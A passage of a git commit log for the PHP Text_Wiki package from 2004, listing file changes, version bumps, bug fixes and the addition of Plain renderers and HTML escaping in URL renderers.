 create mode 100755 Text/Wiki/Parse/Embed.php
 create mode 100755 Text/Wiki/Parse/Emphasis.php
 create mode 100755 Text/Wiki/Parse/Freelink.php
 create mode 100755 Text/Wiki/Parse/Heading.php
 create mode 100755 Text/Wiki/Parse/Horiz.php
 create mode 100755 Text/Wiki/Parse/Html.php
 create mode 100755 Text/Wiki/Parse/Image.php
 create mode 100755 Text/Wiki/Parse/Include.php
 create mode 100755 Text/Wiki/Parse/Interwiki.php
 create mode 100755 Text/Wiki/Parse/Italic.php
 create mode 100755 Text/Wiki/Parse/List.php
 create mode 100755 Text/Wiki/Parse/Newline.php
 create mode 100755 Text/Wiki/Parse/Paragraph.php
 create mode 100755 Text/Wiki/Parse/Phplookup.php
 create mode 100755 Text/Wiki/Parse/Prefilter.php
 create mode 100755 Text/Wiki/Parse/Raw.php
 create mode 100755 Text/Wiki/Parse/Revise.php
 create mode 100755 Text/Wiki/Parse/Strong.php
 create mode 100755 Text/Wiki/Parse/Superscript.php
 create mode 100755 Text/Wiki/Parse/Table.php
 create mode 100755 Text/Wiki/Parse/Tighten.php
 create mode 100755 Text/Wiki/Parse/Toc.php
 create mode 100755 Text/Wiki/Parse/Translatehtml.php
 create mode 100755 Text/Wiki/Parse/Tt.php
 create mode 100755 Text/Wiki/Parse/Url.php
 create mode 100755 Text/Wiki/Parse/Wikilink.php
 create mode 100755 Text/Wiki/Render.php
 create mode 100755 Text/Wiki/Render/Xhtml.php
 create mode 100755 Text/Wiki/Render/Xhtml/Blockquote.php
 create mode 100755 Text/Wiki/Render/Xhtml/Bold.php
 create mode 100755 Text/Wiki/Render/Xhtml/Break.php
 create mode 100755 Text/Wiki/Render/Xhtml/Center.php
 create mode 100755 Text/Wiki/Render/Xhtml/Code.php
 create mode 100755 Text/Wiki/Render/Xhtml/Colortext.php
 create mode 100755 Text/Wiki/Render/Xhtml/Deflist.php
 create mode 100755 Text/Wiki/Render/Xhtml/Delimiter.php
 create mode 100755 Text/Wiki/Render/Xhtml/Embed.php
 create mode 100755 Text/Wiki/Render/Xhtml/Emphasis.php
 create mode 100755 Text/Wiki/Render/Xhtml/Freelink.php
 create mode 100755 Text/Wiki/Render/Xhtml/Heading.php
 create mode 100755 Text/Wiki/Render/Xhtml/Horiz.php
 create mode 100755 Text/Wiki/Render/Xhtml/Html.php
 create mode 100755 Text/Wiki/Render/Xhtml/Image.php
 create mode 100755 Text/Wiki/Render/Xhtml/Include.php
 create mode 100755 Text/Wiki/Render/Xhtml/Interwiki.php
 create mode 100755 Text/Wiki/Render/Xhtml/Italic.php
 create mode 100755 Text/Wiki/Render/Xhtml/List.php
 create mode 100755 Text/Wiki/Render/Xhtml/Newline.php
 create mode 100755 Text/Wiki/Render/Xhtml/Paragraph.php
 create mode 100755 Text/Wiki/Render/Xhtml/Phplookup.php
 create mode 100755 Text/Wiki/Render/Xhtml/Prefilter.php
 create mode 100755 Text/Wiki/Render/Xhtml/Raw.php
 create mode 100755 Text/Wiki/Render/Xhtml/Revise.php
 create mode 100755 Text/Wiki/Render/Xhtml/Strong.php
 create mode 100755 Text/Wiki/Render/Xhtml/Superscript.php
 create mode 100755 Text/Wiki/Render/Xhtml/Table.php
 create mode 100755 Text/Wiki/Render/Xhtml/Tighten.php
 create mode 100755 Text/Wiki/Render/Xhtml/Toc.php
 create mode 100755 Text/Wiki/Render/Xhtml/Translatehtml.php
 create mode 100755 Text/Wiki/Render/Xhtml/Tt.php
 create mode 100755 Text/Wiki/Render/Xhtml/Url.php
 create mode 100755 Text/Wiki/Render/Xhtml/Wikilink.php

http://github.com/horde/horde/commit/241808f7ef9f279bfb2fb7977175a96787aa5792

-----------------------------------------------------------------------

commit bc49952d01be59d0c2d33fbbf24e26a9ae1c2c8b
Author: Paul M Jones 
Date:   Sun Jun 6 15:52:43 2004 +0000

    updated Wiki.php to match the new directory structure
    
    no longer need to specify additional info in $rules property, only need the rule name
    
    added $_dirSep property for directory separator character
    
    added $disable property to mark disabled rules
    
    moved old $rules['rulename']['conf'] to $parseConf[] and $renderConf[] and $formatConf[], this is a result of the splitting of rules into parse and render classes, along with [get|set][Parse|Format|Render]Conf() methods
    
    made most private properties into public properties, becuase of rule-splitting
    
    added Savant-style file path searching for user-defined parse and render rules, with methods addPath(), getPath(), fixPath(), and findFile()
    
    moved token setting and getting from the old rules object into the main Text_Wiki object
    
    object loading has changed as well, with separate methods for loading parse, format, and render objects
    
    I can almost guarantee there are still bugs, probably in the [insert|delete|change]Rule() methods, possibly elsewhere, but it's time to roll a release so other devs can start looking at the changes
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 160661 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 1289 +++++++++++++++++++++++++++++++++++++--------------------
 1 file changed, 838 insertions(+), 451 deletions(-)

http://github.com/horde/horde/commit/bc49952d01be59d0c2d33fbbf24e26a9ae1c2c8b

-----------------------------------------------------------------------

commit 419d08f87f2295f39d37558129d646911a7c5c26
Author: Paul M Jones 
Date:   Sun Jun 6 15:53:38 2004 +0000

    added date to the release
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 160662 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 170 ++++++++++++++++++++++++++++++++++++++----------------------
 1 file changed, 109 insertions(+), 61 deletions(-)

http://github.com/horde/horde/commit/419d08f87f2295f39d37558129d646911a7c5c26

-----------------------------------------------------------------------

commit f46447d92171f8464c5fdb4c3e60a8f088ffd6f8
Author: Paul M Jones 
Date:   Sun Jun 6 15:55:00 2004 +0000

    moved and commented on the $_dirSep property
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 160663 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 16 ++++++++++++++--
 1 file changed, 14 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/f46447d92171f8464c5fdb4c3e60a8f088ffd6f8

-----------------------------------------------------------------------

commit 7c49065032f715f0cd8de438344951b8fc7259b1
Author: Paul M Jones 
Date:   Sun Jun 6 22:39:28 2004 +0000

    fixed insertRule() so that it inserts properly when a second argument is passed
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 160683 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 29 ++++++++++++++---------------
 1 file changed, 14 insertions(+), 15 deletions(-)

http://github.com/horde/horde/commit/7c49065032f715f0cd8de438344951b8fc7259b1

-----------------------------------------------------------------------

commit 7ebbcc9697b24e223af7cb51ac855bc307115e18
Author: Paul M Jones 
Date:   Mon Jun 7 00:43:44 2004 +0000

    no changes in list.php
    updated package.xml to 0.19.1
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 160693 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 20 +++-----------------
 1 file changed, 3 insertions(+), 17 deletions(-)

http://github.com/horde/horde/commit/7ebbcc9697b24e223af7cb51ac855bc307115e18

-----------------------------------------------------------------------

commit c3d4bccc1e6d3b4b4d33131b9ceed5d0d590b543
Author: Paul M Jones 
Date:   Fri Jun 11 14:57:24 2004 +0000

    fixed bugs 1571 and 1573
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 161094 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Embed.php        | 34 +++++++++++++++++++++++++++-------
 Text/Wiki/Parse/Include.php      | 28 ++++++++++++++++++++++------
 Text/Wiki/Render/Xhtml/Embed.php |  9 ++-------
 3 files changed, 51 insertions(+), 20 deletions(-)

http://github.com/horde/horde/commit/c3d4bccc1e6d3b4b4d33131b9ceed5d0d590b543

-----------------------------------------------------------------------

commit c5d7885a6f2fb104504c04a15ca7a5a878ca1b96
Author: Paul M Jones 
Date:   Fri Jun 11 15:00:03 2004 +0000

    updated to 0.19.2
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 161095 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 2 +-
 package.xml   | 8 ++++----
 2 files changed, 5 insertions(+), 5 deletions(-)

http://github.com/horde/horde/commit/c5d7885a6f2fb104504c04a15ca7a5a878ca1b96

-----------------------------------------------------------------------

commit d24f6efda632a257109b25254bc0b71c2d830786
Author: Paul M Jones 
Date:   Fri Jun 11 16:51:29 2004 +0000

    fixed bug 1616
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 161103 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Blockquote.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/d24f6efda632a257109b25254bc0b71c2d830786

-----------------------------------------------------------------------

commit c3b7461c66ef398a5df9055e3a079f16fc01d815
Author: Paul M Jones 
Date:   Fri Jun 11 16:53:01 2004 +0000

    per note from Stephane Solliec, images now always render with an "alt" attribute
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 161104 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Image.php | 11 ++++++++++-
 1 file changed, 10 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/c3b7461c66ef398a5df9055e3a079f16fc01d815

-----------------------------------------------------------------------

commit 326dd8928a5f21694c8982a92e1522f57f198d3d
Author: Paul M Jones 
Date:   Fri Jun 11 17:20:33 2004 +0000

    image now accepts URLs in "link" attribute
    updated package.xml with same note
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 161105 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Image.php | 12 +++++++++---
 package.xml                      |  8 +++++---
 2 files changed, 14 insertions(+), 6 deletions(-)

http://github.com/horde/horde/commit/326dd8928a5f21694c8982a92e1522f57f198d3d

-----------------------------------------------------------------------

commit 1409cf94b5e0cf78b44b51ca7af1a80508056615
Author: Paul M Jones 
Date:   Sat Jun 12 13:40:40 2004 +0000

    updated to 0.19.3 version number
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 161152 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 2 +-
 package.xml   | 4 ++--
 2 files changed, 3 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/1409cf94b5e0cf78b44b51ca7af1a80508056615

-----------------------------------------------------------------------

commit 4776595fd052daf97cded6aa4e8ec9cb0e40ba28
Author: Paul M Jones 
Date:   Mon Jun 14 01:48:07 2004 +0000

    apply htmlspecialchars() to $href, $target, and $text
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 161295 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Url.php | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/4776595fd052daf97cded6aa4e8ec9cb0e40ba28

-----------------------------------------------------------------------

commit 102c7280c4217325425955b64bfc6f797acd4a2a
Author: Paul M Jones 
Date:   Mon Jun 14 01:50:27 2004 +0000

    apply htmlspecialchars() to $href and $text, apply urlencode() to $page
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 161296 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Freelink.php | 11 +++++++----
 1 file changed, 7 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/102c7280c4217325425955b64bfc6f797acd4a2a

-----------------------------------------------------------------------

commit e03b93b3ade8a3ec9ec593ef03847e252b8c2662
Author: Paul M Jones 
Date:   Mon Jun 14 02:06:39 2004 +0000

    fixed bug 1628
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 161297 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 10 ++++------
 1 file changed, 4 insertions(+), 6 deletions(-)

http://github.com/horde/horde/commit/e03b93b3ade8a3ec9ec593ef03847e252b8c2662

-----------------------------------------------------------------------

commit 3ae847948696cdbb862992abfd4077bef00961ee
Author: Paul M Jones 
Date:   Sat Jun 19 16:02:12 2004 +0000

    * Fixed bug 1628 (encoding of URLs and freelinks)
    
    * Updated "Table" parser and Xhtml renderer to mark a header cell (e.g., "||~ this is a header ||")
    
    * Added "Anchor" parser and Xhtml renderer to mark anchors on a page, submitted by Manuel Holtgrewe (e.g., "[[# anchorName nice anchor text]]" to mark anchor, "#anchorName" to link to it)
    
    * Updated "URL" parser and Xhtml renderer to recognize on-page anchors
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 161723 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php                     |  1 +
 Text/Wiki/Parse/Anchor.php        | 67 +++++++++++++++++++++++++++++++++++++++
 Text/Wiki/Parse/Table.php         | 33 ++++++++++---------
 Text/Wiki/Parse/Url.php           |  3 +-
 Text/Wiki/Render/Xhtml/Anchor.php | 31 ++++++++++++++++++
 Text/Wiki/Render/Xhtml/Table.php  | 47 ++++++++++++++++++++-------
 Text/Wiki/Render/Xhtml/Url.php    | 11 +++++--
 package.xml                       |  5 ++-
 8 files changed, 166 insertions(+), 32 deletions(-)
 create mode 100644 Text/Wiki/Parse/Anchor.php
 create mode 100644 Text/Wiki/Render/Xhtml/Anchor.php

http://github.com/horde/horde/commit/3ae847948696cdbb862992abfd4077bef00961ee

-----------------------------------------------------------------------

commit 049b057a67f92a62c4f62a0d4629912f4cc98fe5
Author: Paul M Jones 
Date:   Sat Jun 19 23:51:34 2004 +0000

    updated to 0.19.4 with changes and date
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 161766 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/049b057a67f92a62c4f62a0d4629912f4cc98fe5

-----------------------------------------------------------------------

commit 4cad80c81c202954d2fa2e67d440f71f217e2177
Author: Paul M Jones 
Date:   Sat Jun 19 23:52:31 2004 +0000

    added "anchor" rule for parse and xhtml/render
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 161767 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/4cad80c81c202954d2fa2e67d440f71f217e2177

-----------------------------------------------------------------------

commit f6666d74c6761a1b79879d595068ee85321fb7b9
Author: Paul M Jones 
Date:   Sat Jun 26 00:12:04 2004 +0000

    fixed bug 1722 (can't use two instances of Text_Wiki)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 162082 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/f6666d74c6761a1b79879d595068ee85321fb7b9

-----------------------------------------------------------------------

commit 4b2c24533dea9280b91e738d7dd5840c07b27ae8
Author: Paul M Jones 
Date:   Sat Jun 26 01:01:10 2004 +0000

    fixed bug 1709 (interwiki targets are invalid)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 162085 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Interwiki.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/4b2c24533dea9280b91e738d7dd5840c07b27ae8

-----------------------------------------------------------------------

commit a4cbe54c7e4994a4d4d08c3fbadaf7314e5b9b7e
Author: Paul M Jones 
Date:   Sat Jun 26 01:13:30 2004 +0000

    updated for 0.19.5
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 162086 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 12 +++++-------
 1 file changed, 5 insertions(+), 7 deletions(-)

http://github.com/horde/horde/commit/a4cbe54c7e4994a4d4d08c3fbadaf7314e5b9b7e

-----------------------------------------------------------------------

commit 8794915b4b62f346ff1db21c982abefe8387bacf
Author: Paul M Jones 
Date:   Mon Jun 28 23:10:37 2004 +0000

    removed '#' scheme support for same-page anchor references, also added a ':' to the mailto scheme
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 162273 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Url.php | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

http://github.com/horde/horde/commit/8794915b4b62f346ff1db21c982abefe8387bacf

-----------------------------------------------------------------------

commit 82d971caad3b6f4e89acc53835654930a34ead6f
Author: Paul M Jones 
Date:   Mon Jun 28 23:18:11 2004 +0000

    updated to 0.19.6
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 162275 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

http://github.com/horde/horde/commit/82d971caad3b6f4e89acc53835654930a34ead6f

-----------------------------------------------------------------------

commit ca5b316c358e72e3e6314efff12537ebaa0ac16c
Author: Paul M Jones 
Date:   Sun Jul 11 17:09:36 2004 +0000

    for minimal XHTML compliance, the target attribute is left out by default (it used to be 'target="_blank"' by default, which is not XHTML 1.0 Strict compliant)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 163067 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Url.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/ca5b316c358e72e3e6314efff12537ebaa0ac16c

-----------------------------------------------------------------------

commit 7b458928d67bf878779aa9efc22d2feb5ef2c824
Author: Paul M Jones 
Date:   Sun Jul 11 17:11:43 2004 +0000

    updated version number, added change note about URL targets
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 163068 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 9 ++++-----
 1 file changed, 4 insertions(+), 5 deletions(-)

http://github.com/horde/horde/commit/7b458928d67bf878779aa9efc22d2feb5ef2c824

-----------------------------------------------------------------------

commit 168bd7541998bc468aa8353b2cbf808b141fec6b
Author: Paul M Jones 
Date:   Sun Jul 11 17:11:59 2004 +0000

    updated version number
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 163069 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/168bd7541998bc468aa8353b2cbf808b141fec6b

-----------------------------------------------------------------------

commit 57b6ec86fe8ff648bc9a2934d84e0179d0035b5d
Author: Paul M Jones 
Date:   Tue Jul 20 14:10:38 2004 +0000

    added renderer Plain for plain text
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 163740 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Plain.php | 16 ++++++++++++++++
 1 file changed, 16 insertions(+)
 create mode 100755 Text/Wiki/Render/Plain.php

http://github.com/horde/horde/commit/57b6ec86fe8ff648bc9a2934d84e0179d0035b5d

-----------------------------------------------------------------------

commit cbe5125df291fb68b499180330915e6e4e3f7246
Author: Paul M Jones 
Date:   Tue Jul 20 14:10:55 2004 +0000

    added Plain renderers
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 163741 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Anchor.php        | 12 +---
 Text/Wiki/Render/Xhtml/Blockquote.php    | 16 ++----
 Text/Wiki/Render/Xhtml/Bold.php          | 10 +---
 Text/Wiki/Render/Xhtml/Break.php         |  4 +-
 Text/Wiki/Render/Xhtml/Center.php        | 12 +---
 Text/Wiki/Render/Xhtml/Code.php          | 72 +----------------------
 Text/Wiki/Render/Xhtml/Colortext.php     | 37 +-----------
 Text/Wiki/Render/Xhtml/Deflist.php       | 46 +++------------
 Text/Wiki/Render/Xhtml/Delimiter.php     |  4 +-
 Text/Wiki/Render/Xhtml/Embed.php         |  4 +-
 Text/Wiki/Render/Xhtml/Emphasis.php      | 10 +---
 Text/Wiki/Render/Xhtml/Freelink.php      | 45 +--------------
 Text/Wiki/Render/Xhtml/Heading.php       | 17 ++----
 Text/Wiki/Render/Xhtml/Horiz.php         |  4 +-
 Text/Wiki/Render/Xhtml/Html.php          |  4 +-
 Text/Wiki/Render/Xhtml/Image.php         | 51 +----------------
 Text/Wiki/Render/Xhtml/Include.php       |  2 +-
 Text/Wiki/Render/Xhtml/Interwiki.php     | 41 +------------
 Text/Wiki/Render/Xhtml/Italic.php        | 10 +---
 Text/Wiki/Render/Xhtml/List.php          | 98 ++------------------------------
 Text/Wiki/Render/Xhtml/Newline.php       |  4 +-
 Text/Wiki/Render/Xhtml/Paragraph.php     |  6 +-
 Text/Wiki/Render/Xhtml/Phplookup.php     | 11 +---
 Text/Wiki/Render/Xhtml/Prefilter.php     |  2 +-
 Text/Wiki/Render/Xhtml/Raw.php           |  2 +-
 Text/Wiki/Render/Xhtml/Revise.php        | 18 +-----
 Text/Wiki/Render/Xhtml/Strong.php        | 10 +---
 Text/Wiki/Render/Xhtml/Superscript.php   | 10 +---
 Text/Wiki/Render/Xhtml/Table.php         | 83 +++------------------------
 Text/Wiki/Render/Xhtml/Tighten.php       |  2 +-
 Text/Wiki/Render/Xhtml/Toc.php           | 31 +---------
 Text/Wiki/Render/Xhtml/Translatehtml.php |  2 +-
 Text/Wiki/Render/Xhtml/Tt.php            | 10 +---
 Text/Wiki/Render/Xhtml/Url.php           | 56 +-----------------
 Text/Wiki/Render/Xhtml/Wikilink.php      | 58 +------------------
 35 files changed, 88 insertions(+), 716 deletions(-)

http://github.com/horde/horde/commit/cbe5125df291fb68b499180330915e6e4e3f7246

-----------------------------------------------------------------------

commit 6cd056fd6e7b2b0c540ccf4faa224a00c6476f6b
Author: Paul M Jones 
Date:   Tue Jul 20 14:11:41 2004 +0000

    updated to 0.20 version number
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 163742 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/6cd056fd6e7b2b0c540ccf4faa224a00c6476f6b

-----------------------------------------------------------------------

commit d8c9e32e7a0b486699433bf086d0121cae04004d
Author: Paul M Jones 
Date:   Tue Jul 20 14:12:01 2004 +0000

    updated with 0.20 release notes and files
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 163743 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 53 ++++++++++++++++++++++++++++++++++++++++++++++++-----
 1 file changed, 48 insertions(+), 5 deletions(-)

http://github.com/horde/horde/commit/d8c9e32e7a0b486699433bf086d0121cae04004d

-----------------------------------------------------------------------

commit fb523143824a6f59b5eb7c4c4e891de9eb2509c7
Author: Paul M Jones 
Date:   Tue Jul 20 14:16:20 2004 +0000

    changed to 0.20.0 (three numbers not two)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 163745 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/fb523143824a6f59b5eb7c4c4e891de9eb2509c7

-----------------------------------------------------------------------

commit d498fe935a18f9c187c68469c5c11dc4e496db4b
Author: Paul M Jones 
Date:   Tue Jul 20 15:49:17 2004 +0000

    removed bad copies of Xhtml and Plain dirs, will replace
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 163762 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Anchor.php        | 23 -----------
 Text/Wiki/Render/Xhtml/Blockquote.php    | 39 ------------------
 Text/Wiki/Render/Xhtml/Bold.php          | 23 -----------
 Text/Wiki/Render/Xhtml/Break.php         | 24 -----------
 Text/Wiki/Render/Xhtml/Center.php        | 23 -----------
 Text/Wiki/Render/Xhtml/Code.php          | 24 -----------
 Text/Wiki/Render/Xhtml/Colortext.php     | 23 -----------
 Text/Wiki/Render/Xhtml/Deflist.php       | 59 ---------------------------
 Text/Wiki/Render/Xhtml/Delimiter.php     | 23 -----------
 Text/Wiki/Render/Xhtml/Embed.php         | 23 -----------
 Text/Wiki/Render/Xhtml/Emphasis.php      | 23 -----------
 Text/Wiki/Render/Xhtml/Freelink.php      | 23 -----------
 Text/Wiki/Render/Xhtml/Heading.php       | 14 -------
 Text/Wiki/Render/Xhtml/Horiz.php         | 23 -----------
 Text/Wiki/Render/Xhtml/Html.php          | 24 -----------
 Text/Wiki/Render/Xhtml/Image.php         | 22 -----------
 Text/Wiki/Render/Xhtml/Include.php       |  8 ----
 Text/Wiki/Render/Xhtml/Interwiki.php     | 23 -----------
 Text/Wiki/Render/Xhtml/Italic.php        | 23 -----------
 Text/Wiki/Render/Xhtml/List.php          | 68 --------------------------------
 Text/Wiki/Render/Xhtml/Newline.php       | 12 ------
 Text/Wiki/Render/Xhtml/Paragraph.php     | 31 ---------------
 Text/Wiki/Render/Xhtml/Phplookup.php     | 25 ------------
 Text/Wiki/Render/Xhtml/Prefilter.php     | 40 -------------------
 Text/Wiki/Render/Xhtml/Raw.php           | 23 -----------
 Text/Wiki/Render/Xhtml/Revise.php        | 24 -----------
 Text/Wiki/Render/Xhtml/Strong.php        | 24 -----------
 Text/Wiki/Render/Xhtml/Superscript.php   | 23 -----------
 Text/Wiki/Render/Xhtml/Table.php         | 57 --------------------------
 Text/Wiki/Render/Xhtml/Tighten.php       | 10 -----
 Text/Wiki/Render/Xhtml/Toc.php           | 39 ------------------
 Text/Wiki/Render/Xhtml/Translatehtml.php |  9 -----
 Text/Wiki/Render/Xhtml/Tt.php            | 24 -----------
 Text/Wiki/Render/Xhtml/Url.php           | 25 ------------
 Text/Wiki/Render/Xhtml/Wikilink.php      | 24 -----------
 35 files changed, 925 deletions(-)
 delete mode 100644 Text/Wiki/Render/Xhtml/Anchor.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Blockquote.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Bold.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Break.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Center.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Code.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Colortext.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Deflist.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Delimiter.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Embed.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Emphasis.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Freelink.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Heading.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Horiz.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Html.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Image.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Include.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Interwiki.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Italic.php
 delete mode 100755 Text/Wiki/Render/Xhtml/List.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Newline.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Paragraph.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Phplookup.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Prefilter.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Raw.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Revise.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Strong.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Superscript.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Table.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Tighten.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Toc.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Translatehtml.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Tt.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Url.php
 delete mode 100755 Text/Wiki/Render/Xhtml/Wikilink.php

http://github.com/horde/horde/commit/d498fe935a18f9c187c68469c5c11dc4e496db4b

-----------------------------------------------------------------------

commit 05ef3d09ecba2c2495184571c1f1f962ec55a543
Author: Paul M Jones 
Date:   Tue Jul 20 15:52:03 2004 +0000

    added Plain renderer files
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 163763 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Plain/Anchor.php        | 23 +++++++++++
 Text/Wiki/Render/Plain/Blockquote.php    | 39 ++++++++++++++++++
 Text/Wiki/Render/Plain/Bold.php          | 23 +++++++++++
 Text/Wiki/Render/Plain/Break.php         | 24 +++++++++++
 Text/Wiki/Render/Plain/Center.php        | 23 +++++++++++
 Text/Wiki/Render/Plain/Code.php          | 24 +++++++++++
 Text/Wiki/Render/Plain/Colortext.php     | 23 +++++++++++
 Text/Wiki/Render/Plain/Deflist.php       | 59 +++++++++++++++++++++++++++
 Text/Wiki/Render/Plain/Delimiter.php     | 23 +++++++++++
 Text/Wiki/Render/Plain/Embed.php         | 23 +++++++++++
 Text/Wiki/Render/Plain/Emphasis.php      | 23 +++++++++++
 Text/Wiki/Render/Plain/Freelink.php      | 23 +++++++++++
 Text/Wiki/Render/Plain/Heading.php       | 14 +++++++
 Text/Wiki/Render/Plain/Horiz.php         | 23 +++++++++++
